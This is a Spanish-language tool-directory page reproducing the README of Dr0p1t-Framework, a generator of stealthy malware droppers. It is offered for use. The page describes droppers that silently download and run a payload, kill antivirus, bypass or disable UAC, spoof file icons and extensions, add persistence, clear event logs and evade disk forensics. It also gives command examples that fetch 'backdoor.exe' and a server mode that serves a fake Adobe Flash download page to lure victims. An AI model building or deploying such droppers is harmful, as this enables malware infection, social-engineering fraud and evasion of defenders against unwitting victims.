Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Dr0p1t-Framework — Un framework que crea un dropper sigiloso avanzado que evade la mayoría de los AV y tiene muchos trucos. | Kitploit
Herramientas/GitHubGitHub/d4vinci/dr0p1t-framework
Escalada de PrivilegiosGeneración de PayloadsMecanismos de PersistenciaExplotaciónEvasión de IDS/IPSAnálisis ForensePhishingAnálisis de MalwareComando y ControlIngeniería SocialDesarrollo de PayloadsAnti-Bot
1.5k3875hace 7 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Archived
GitHubd4vinci/dr0p1t-framework

Dr0p1t-Framework

Un framework que crea un dropper sigiloso avanzado que evade la mayoría de los AV y tiene muchos trucos.

Ver Repositorio

Actualmente no mantenido (Espera la próxima versión)


Dr0p1t-Framework n0where best cybersecurity tools Python 3.5 Python 2.7 Build Status

¿Alguna vez has oído hablar de los troyanos droppers? En resumen, un dropper es un tipo de malware que descarga otros malware y Dr0p1t te da la oportunidad de crear un dropper sigiloso que evade la mayoría de los AV y tiene un montón de trucos (¡Confía en mí! :D) ;)

Características

+ Propiedades del ejecutable generado:

  • El tamaño del ejecutable es menor en comparación con otros droppers generados de la misma manera.
  • Descarga el ejecutable en el sistema objetivo y lo ejecuta silenciosamente...
  • Función de autodestrucción para que el dropper se elimine a sí mismo después de finalizar su trabajo.
  • Evita la forense de disco haciendo que todos los archivos que el dropper crea se limpien antes de su eliminación.
  • Limpia el registro de eventos al finalizar.

+ Propiedades del framework:

  • Funciona con Windows, Linux y ahora tiene soporte para OSX (Gracias a @sm4sh3r)
  • Función Dr0p1t-Server (beta) para que puedas trabajar desde el navegador Ver cómo trabajar con Dr0p1t-Server
  • Dr0p1t-Server tiene una opción de estafa (beta) Ver cómo trabajar con Dr0p1t-Server

+ Módulos:

  • Encuentra y mata el antivirus antes de ejecutar el malware.
  • La capacidad de deshabilitar UAC.
  • La capacidad de ejecutar tu malware como administrador.
  • Spoofing completo mediante la suplantación del icono y la extensión del archivo a lo que quieras.
  • Soporte para archivos ZIP para que puedas comprimir tu ejecutable en un archivo zip antes de subirlo.
  • Ejecutar un archivo personalizado (batch|powershell|vbs) que hayas elegido antes de ejecutar el ejecutable.
  • Al ejecutar scripts de PowerShell, puede omitir la política de ejecución.
  • Usar UPX para comprimir el dropper después de crearlo.

+ Módulos de persistencia:

  • Agregar el ejecutable después de descargarlo al inicio.
  • Agregar el ejecutable después de descargarlo al programador de tareas (UAC no importa).
  • Agregar tu archivo al perfil de usuario de PowerShell para que se descargue y ejecute cada vez que se ejecute powershell.exe si no existe.

Capturas de pantalla

En Windows

Ver más

En Linux (Kali Linux)

Ver más

En OSX

¡Todavía no está completamente probado! Necesitamos algunos colaboradores y probadores 😄

Menú de ayuda

root@kitploit:~
Usage: Dr0p1t.py Malware_Url [Options]

options:
-h, --help      show this help message and exit
-s              Add your malware to startup (Persistence)
-t              Add your malware to task scheduler (Persistence)
-a              Add your link to powershell user profile (Persistence)
-k              Kill antivirus process before running your malware.
-b              Run this batch script before running your malware. Check scripts folder
-p              Run this powershell script before running your malware. Check scripts folder
-v              Run this vbs script before running your malware. Check scripts folder
--runas         Bypass UAC and run your malware as admin
--spoof         Spoof the final file to an extension you choose.
--zip           Tell Dr0p1t that the malware in the link is compressed as zip
--upx           Use UPX to compress the final file.
--nouac         Try to disable UAC on victim device
-i              Use icon to the final file. Check icons folder.
--noclearevent  Tell the framework to not clear the event logs on target machine after finish.
--nocompile     Tell the framework to not compile the final file.
--only32        Download your malware for 32 bit devices only
--only64        Download your malware for 64 bit devices only
-q              Stay quite ( no banner )
-u              Check for updates
-nd             Display less output information

Ejemplos

root@kitploit:~
./Dr0p1t.py Malware_Url [Options]
./Dr0p1t.py https://test.com/backdoor.exe -s -t -a -k --runas --upx
./Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat --only32
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1 --runas
./Dr0p1t.py https://test.com/backdoor.zip -t -k --nouac -i flash.ico --spoof pdf --zip

Requisitos previos

  • Python 2 o Python 3.

La versión recomendada para Python 2 es 2.7.x, la versión recomendada para Python 3 es 3.5.x y no uses 3.6 porque aún no es compatible con PyInstaller

Dependencias necesarias para Linux

  • apt
  • Otras se instalarán desde el archivo install.sh

Nota: Debes tener acceso root

Dependencias necesarias para Windows

  • pip
  • Módulos en windows_requirements.txt

Instalación

Aquí hay una lista de todos los videos oficiales para instalar y usar Dr0p1t Lista de reproducción

  • En Linux
root@kitploit:~
git clone https://github.com/D4Vinci/Dr0p1t-Framework.git
chmod 777 -R Dr0p1t-Framework
cd Dr0p1t-Framework
sudo chmod +x install.sh
./install.sh
python Dr0p1t.py
  • En Windows (Después de descargar el ZIP y descomprimirlo)
root@kitploit:~
cd Dr0p1t-Framework-master
python -m pip install -r windows_requirements.txt
python Dr0p1t.py

Nota: en python 2.7 no tienes pip, así que instálalo primero desde el script get-pip.py [Búscalo en Google]

Probado en:

  • Kali Linux Rolling
  • Ubuntu 14.04-16.04 LTS
  • Windows 10/8.1/8

Trabajar con Dr0p1t-Server

Nota: El servidor aún está en versión beta y tiene muchas características por agregar y también un mejor diseño [¡Necesito un diseñador para contribuir! :D]

Requisitos previos

  • Conexión a internet estable.
  • Puerto 5000 no utilizado y firewall configurado para no bloquear la conexión desde allí

Instalación y ejecución del servidor

En Linux y Windows es lo mismo después de instalar Dr0p1t siguiendo los pasos mencionados anteriormente, instala los módulos en server_requirements.txt usando pip como:

root@kitploit:~
python -m pip install -r server_requirements.txt

Ahora ejecutemos nuestro script del servidor:

root@kitploit:~
python Dr0p1t_Server.py

Después de ejecutar el script del servidor, comenzará a escuchar todas las conexiones que lleguen al puerto 5000 usando flask.

Ahora para usar el servidor desde tu dispositivo, abre en el navegador ya sea 127.0.0.1:5000 o [Tu IP]:5000.

Para abrirlo desde otros dispositivos en la LAN, abre [Tu IP Local]:5000 y para otros dispositivos en la WAN abre [Tu IP Global]:5000, pero asegúrate primero de haber configurado tu router para reenviar las conexiones del puerto 5000 hacia ti.

Después de abrir la página del servidor, verás un sitio web simple con un diseño sencillo que te pide los datos necesarios Ver capturas de pantalla del servidor

Luego envía los datos, serán verificados a través de algunos procesos, luego se generará el archivo exe y serás redirigido a una página que te indica el enlace de estafa.

Después de ingresar el enlace, verás una estafa para descargar el dropper que por defecto es la página de descarga de Adobe Flash.

Para reemplazar la estafa con la tuya, reemplaza el contenido del archivo "Scam.html" con el tuyo, pero recuerda las variables (No las elimines).

Capturas de pantalla del servidor

Ver más para Windows Ver más para Linux

Sin escaneo de distribución (Por favor, no escanees con VirusTotal :3)

Pendientes Mira este enlace

Contacto

  • Twitter

Donación

Si esta herramienta te ha sido útil, siéntete libre de agradecerme invitándome un café :)

Café

Descargo de responsabilidad

Dr0p1t Framework no se hace responsable por el mal uso y por fines ilegales. ¡Úsalo solo para pruebas de penetración o fines educativos!

Copiar código de este framework o usarlo en otra herramienta es aceptable siempre que menciones de dónde lo obtuviste 😄

Las pull requests siempre son bienvenidas :D

Descargar herramienta